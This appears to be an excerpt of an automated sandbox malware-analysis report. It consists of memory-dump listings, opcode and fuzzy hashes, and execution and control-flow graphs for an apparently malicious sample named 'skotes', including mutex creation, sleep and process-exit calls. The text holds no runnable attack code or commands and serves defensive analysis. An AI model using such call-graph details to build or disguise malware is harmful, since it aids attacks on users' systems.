                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709534381.0000000000A4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709547687.0000000000A57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709627052.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709640534.0000000000BAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709683764.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709697024.0000000000BDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709713712.0000000000BEE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709725785.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709740538.0000000000C01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709752873.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709764488.0000000000C05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709781128.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709798976.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709813508.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709826985.0000000000C3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709839358.0000000000C45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709850765.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709863478.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709875979.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709888099.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709901380.0000000000C5D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709913085.0000000000C5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709924660.0000000000C5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709937066.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709949904.0000000000C68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709962676.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709974452.0000000000C6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709986617.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710002067.0000000000C81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000CAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710052072.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710064257.0000000000CDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710076874.0000000000CDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710089532.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710103458.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710115733.0000000000CF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _strrchr
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3213747228-0
                                                                                                                                                                                                                                                                • Opcode ID: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
                                                                                                                                                                                                                                                                • Instruction ID: 9c828413577c97ac4033e3dad648a08e6fffcf991f662afb8bdb52e6b0961707
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DEB156329442959FDB11CF28C8817FEBFF5EF45360F14416AE854EB282D6389E81CBA0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1709477652.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709465412.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709477652.0000000000A42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709522219.0000000000A49000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709534381.0000000000A4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709547687.0000000000A57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709627052.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709640534.0000000000BAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709683764.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709697024.0000000000BDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709713712.0000000000BEE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709725785.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709740538.0000000000C01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709752873.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709764488.0000000000C05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709781128.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709798976.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709813508.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709826985.0000000000C3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709839358.0000000000C45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709850765.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709863478.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709875979.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709888099.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709901380.0000000000C5D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709913085.0000000000C5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709924660.0000000000C5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709937066.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709949904.0000000000C68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709962676.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709974452.0000000000C6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709986617.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710002067.0000000000C81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000CAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710052072.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710064257.0000000000CDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710076874.0000000000CDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710089532.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710103458.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710115733.0000000000CF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Mtx_unlock
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1418687624-0
                                                                                                                                                                                                                                                                • Opcode ID: 115a79566a90eeb7cbada92720bfc510249ca209cacbeae33a69b9297b2d57dd
                                                                                                                                                                                                                                                                • Instruction ID: a4fad485b9621ae2103ea7882cb7eb43a7f687d5d8031181efc607ffd2729ddf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 115a79566a90eeb7cbada92720bfc510249ca209cacbeae33a69b9297b2d57dd
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 37A101B0A05249AFDB12DF66C9487AAB7F8FF55324F00C529E915D7281EB31EE04CB91

                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                Execution Coverage:1%
                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                                Total number of Nodes:207
                                                                                                                                                                                                                                                                Total number of Limit Nodes:9
                                                                                                                                                                                                                                                                execution_graph 9690 add82f 9693 add83c __dosmaperr 9690->9693 9691 add867 RtlAllocateHeap 9692 add87a __dosmaperr 9691->9692 9691->9693 9693->9691 9693->9692 9694 ad6629 9697 ad64c7 9694->9697 9698 ad64d5 __cftof 9697->9698 9699 ad6520 9698->9699 9702 ad652b 9698->9702 9701 ad652a 9708 ada302 GetPEB 9702->9708 9704 ad6535 9705 ad653a GetPEB 9704->9705 9706 ad654a __cftof 9704->9706 9705->9706 9707 ad6562 ExitProcess 9706->9707 9709 ada31c __cftof 9708->9709 9709->9704 9710 aaa856 9711 aaa870 9710->9711 9718 aaa892 shared_ptr 9710->9718 9712 aaa94e 9711->9712 9711->9718 9719 ad6c6a 9712->9719 9715 aaa953 Sleep CreateMutexA 9717 aaa98e 9715->9717 9716 aaa903 9722 ab80c0 9718->9722 9737 ad6bf6 9719->9737 9721 ad6c79 ___std_exception_copy 9725 ab80de 9722->9725 9727 ab8104 9722->9727 9723 ab81ee 9896 ab9270 9723->9896 9725->9716 9726 ab81f3 9899 aa2480 9726->9899 9727->9723 9729 ab817d 9727->9729 9731 ab8158 9727->9731 9732 abd3e2 RtlAllocateHeap 9729->9732 9734 ab8169 __cftof 9729->9734 9731->9726 9891 abd3e2 9731->9891 9732->9734 9735 ad6c6a RtlAllocateHeap 9734->9735 9736 ab81d0 shared_ptr 9734->9736 9735->9723 9736->9716 9743 ada7c8 9737->9743 9739 ad6c01 ___std_exception_copy 9740 ad6c0f 9739->9740 9741 ad6bf6 ___std_exception_copy RtlAllocateHeap 9739->9741 9740->9721 9742 ad6c66 9741->9742 9742->9721 9744 ada7d2 __dosmaperr 9743->9744 9746 ada7eb 9744->9746 9754 add82f 9744->9754 9746->9739 9747 ada813 __dosmaperr 9748 ada853 9747->9748 9749 ada81b __dosmaperr 9747->9749 9762 ada49f 9748->9762 9758 adadf5 9749->9758 9753 adadf5 ___free_lconv_mon RtlAllocateHeap 9753->9746 9757 add83c __dosmaperr 9754->9757 9755 add867 RtlAllocateHeap 9756 add87a __dosmaperr 9755->9756 9755->9757 9756->9747 9757->9755 9757->9756 9759 adae00 9758->9759 9761 adae1b __dosmaperr 9758->9761 9759->9761 9766 ad75f6 9759->9766 9761->9746 9763 ada50d __dosmaperr 9762->9763 9769 ada445 9763->9769 9765 ada536 9765->9753 9767 ada7c8 __dosmaperr RtlAllocateHeap 9766->9767 9768 ad75fb 9767->9768 9768->9761 9770 ada451 __cftof 9769->9770 9773 ada626 9770->9773 9772 ada473 __dosmaperr 9772->9765 9774 ada65c __cftof 9773->9774 9775 ada635 __cftof 9773->9775 9774->9772 9775->9774 9777 adf35f 9775->9777 9778 adf3df 9777->9778 9785 adf375 9777->9785 9780 adadf5 ___free_lconv_mon RtlAllocateHeap 9778->9780 9804 adf42d 9778->9804 9781 adf401 9780->9781 9783 adadf5 ___free_lconv_mon RtlAllocateHeap 9781->9783 9782 adf3a8 9784 adf3ca 9782->9784 9792 adadf5 ___free_lconv_mon RtlAllocateHeap 9782->9792 9786 adf414 9783->9786 9787 adadf5 ___free_lconv_mon RtlAllocateHeap 9784->9787 9785->9778 9785->9782 9788 adadf5 ___free_lconv_mon RtlAllocateHeap 9785->9788 9791 adadf5 ___free_lconv_mon RtlAllocateHeap 9786->9791 9793 adf3d4 9787->9793 9790 adf39d 9788->9790 9789 adf43b 9794 adf49b 9789->9794 9803 adadf5 RtlAllocateHeap ___free_lconv_mon 9789->9803 9805 adef3c 9790->9805 9796 adf422 9791->9796 9797 adf3bf 9792->9797 9798 adadf5 ___free_lconv_mon RtlAllocateHeap 9793->9798 9799 adadf5 ___free_lconv_mon RtlAllocateHeap 9794->9799 9801 adadf5 ___free_lconv_mon RtlAllocateHeap 9796->9801 9833 adf03a 9797->9833 9798->9778 9800 adf4a1 9799->9800 9800->9774 9801->9804 9803->9789 9845 adf4d0 9804->9845 9806 adef4d 9805->9806 9832 adf036 9805->9832 9807 adef5e 9806->9807 9809 adadf5 ___free_lconv_mon RtlAllocateHeap 9806->9809 9808 adef70 9807->9808 9810 adadf5 ___free_lconv_mon RtlAllocateHeap 9807->9810 9811 adef82 9808->9811 9812 adadf5 ___free_lconv_mon RtlAllocateHeap 9808->9812 9809->9807 9810->9808 9813 adef94 9811->9813 9814 adadf5 ___free_lconv_mon RtlAllocateHeap 9811->9814 9812->9811 9815 adadf5 ___free_lconv_mon RtlAllocateHeap 9813->9815 9819 adefa6 9813->9819 9814->9813 9815->9819 9816 adadf5 ___free_lconv_mon RtlAllocateHeap 9818 adefb8 9816->9818 9817 adefca 9821 adefdc 9817->9821 9822 adadf5 ___free_lconv_mon RtlAllocateHeap 9817->9822 9818->9817 9820 adadf5 ___free_lconv_mon RtlAllocateHeap 9818->9820 9819->9816 9819->9818 9820->9817 9823 adefee 9821->9823 9825 adadf5 ___free_lconv_mon RtlAllocateHeap 9821->9825 9822->9821 9824 adf000 9823->9824 9826 adadf5 ___free_lconv_mon RtlAllocateHeap 9823->9826 9827 adf012 9824->9827 9828 adadf5 ___free_lconv_mon RtlAllocateHeap 9824->9828 9825->9823 9826->9824 9829 adf024 9827->9829 9830 adadf5 ___free_lconv_mon RtlAllocateHeap 9827->9830 9828->9827 9831 adadf5 ___free_lconv_mon RtlAllocateHeap 9829->9831 9829->9832 9830->9829 9831->9832 9832->9782 9834 adf047 9833->9834 9844 adf09f 9833->9844 9835 adf057 9834->9835 9837 adadf5 ___free_lconv_mon RtlAllocateHeap 9834->9837 9836 adf069 9835->9836 9838 adadf5 ___free_lconv_mon RtlAllocateHeap 9835->9838 9839 adf07b 9836->9839 9840 adadf5 ___free_lconv_mon RtlAllocateHeap 9836->9840 9837->9835 9838->9836 9841 adf08d 9839->9841 9842 adadf5 ___free_lconv_mon RtlAllocateHeap 9839->9842 9840->9839 9843 adadf5 ___free_lconv_mon RtlAllocateHeap 9841->9843 9841->9844 9842->9841 9843->9844 9844->9784 9846 adf4dd 9845->9846 9847 adf4fc 9845->9847 9846->9847 9851 adf0db 9846->9851 9847->9789 9850 adadf5 ___free_lconv_mon RtlAllocateHeap 9850->9847 9852 adf1b9 9851->9852 9853 adf0ec 9851->9853 9852->9850 9887 adf0a3 9853->9887 9856 adf0a3 __cftof RtlAllocateHeap 9857 adf0ff 9856->9857 9858 adf0a3 __cftof RtlAllocateHeap 9857->9858 9859 adf10a 9858->9859 9860 adf0a3 __cftof RtlAllocateHeap 9859->9860 9861 adf115 9860->9861 9862 adf0a3 __cftof RtlAllocateHeap 9861->9862 9863 adf123 9862->9863 9864 adadf5 ___free_lconv_mon RtlAllocateHeap 9863->9864 9865 adf12e 9864->9865 9866 adadf5 ___free_lconv_mon RtlAllocateHeap 9865->9866 9867 adf139 9866->9867 9868 adadf5 ___free_lconv_mon RtlAllocateHeap 9867->9868 9869 adf144 9868->9869 9870 adf0a3 __cftof RtlAllocateHeap 9869->9870 9871 adf152 9870->9871 9872 adf0a3 __cftof RtlAllocateHeap 9871->9872 9873 adf160 9872->9873 9874 adf0a3 __cftof RtlAllocateHeap 9873->9874 9875 adf171 9874->9875 9876 adf0a3 __cftof RtlAllocateHeap 9875->9876 9877 adf17f 9876->9877 9878 adf0a3 __cftof RtlAllocateHeap 9877->9878 9879 adf18d 9878->9879 9880 adadf5 ___free_lconv_mon RtlAllocateHeap 9879->9880 9881 adf198 9880->9881 9882 adadf5 ___free_lconv_mon RtlAllocateHeap 9881->9882 9883 adf1a3 9882->9883 9884 adadf5 ___free_lconv_mon RtlAllocateHeap 9883->9884 9885 adf1ae 9884->9885 9886 adadf5 ___free_lconv_mon RtlAllocateHeap 9885->9886 9886->9852 9888 adf0d6 9887->9888 9889 adf0c6 9887->9889 9888->9856 9889->9888 9890 adadf5 ___free_lconv_mon RtlAllocateHeap 9889->9890 9890->9889 9892 aa2480 __dosmaperr ___std_exception_copy std::_Throw_future_error 9891->9892 9895 abd401 std::_Throw_future_error 9892->9895 9903 ad38af 9892->9903 9895->9734 9924 abc1b9 9896->9924 9900 aa248e std::_Throw_future_error 9899->9900 9901 ad38af ___std_exception_copy RtlAllocateHeap 9900->9901 9902 aa24c3 9901->9902 9904 aa24c3 9903->9904 9906 ad38bc ___std_exception_copy 9903->9906 9904->9734 9905 ad38e9 9918 ad8ba3 9905->9918 9906->9904 9906->9905 9909 ada1f1 9906->9909 9910 ada20c 9909->9910 9911 ada1fe 9909->9911 9912 ad75f6 __dosmaperr RtlAllocateHeap 9910->9912 9911->9910 9915 ada223 9911->9915 9917 ada214 9912->9917 9914 ada21e 9914->9905 9915->9914 9916 ad75f6 __dosmaperr RtlAllocateHeap 9915->9916 9916->9917 9921 ad6c5a 9917->9921 9919 adadf5 ___free_lconv_mon RtlAllocateHeap 9918->9919 9920 ad8bbb 9919->9920 9920->9904 9922 ad6bf6 ___std_exception_copy RtlAllocateHeap 9921->9922 9923 ad6c66 9922->9923 9923->9914 9927 abc123 9924->9927 9926 abc1ca std::_Throw_future_error 9930 aa22e0 9927->9930 9929 abc135 9929->9926 9931 ad38af ___std_exception_copy RtlAllocateHeap 9930->9931 9932 aa2317 __floor_pentium4 9931->9932 9932->9929

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 358 ad652b-ad6538 call ada302 361 ad655a-ad656c call ad656d ExitProcess 358->361 362 ad653a-ad6548 GetPEB 358->362 362->361 364 ad654a-ad6559 362->364 364->361
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32(?,?,00AD652A,?,?,?,?,?,00AD7661), ref: 00AD6567
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1746831215.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746818244.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746831215.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746877793.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746890667.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746942997.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747030114.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747045083.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747067454.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747067454.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747100705.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747116706.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747133193.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747152191.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747170462.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747187044.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747201259.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747717299.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747770840.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747793172.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747837126.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747874251.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747972191.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747993810.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748029577.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748115115.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748132302.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748152837.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748166578.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748181609.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748195716.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748211983.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748227277.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748240665.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748257722.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748271446.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748271446.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748315030.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748328600.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748341677.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748356647.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748371532.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748384236.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                                                                                                                • Opcode ID: daaeaa316780847bbb546f57e85c6a8b2bc3d0f72fa22a92d1f47cbe42324067
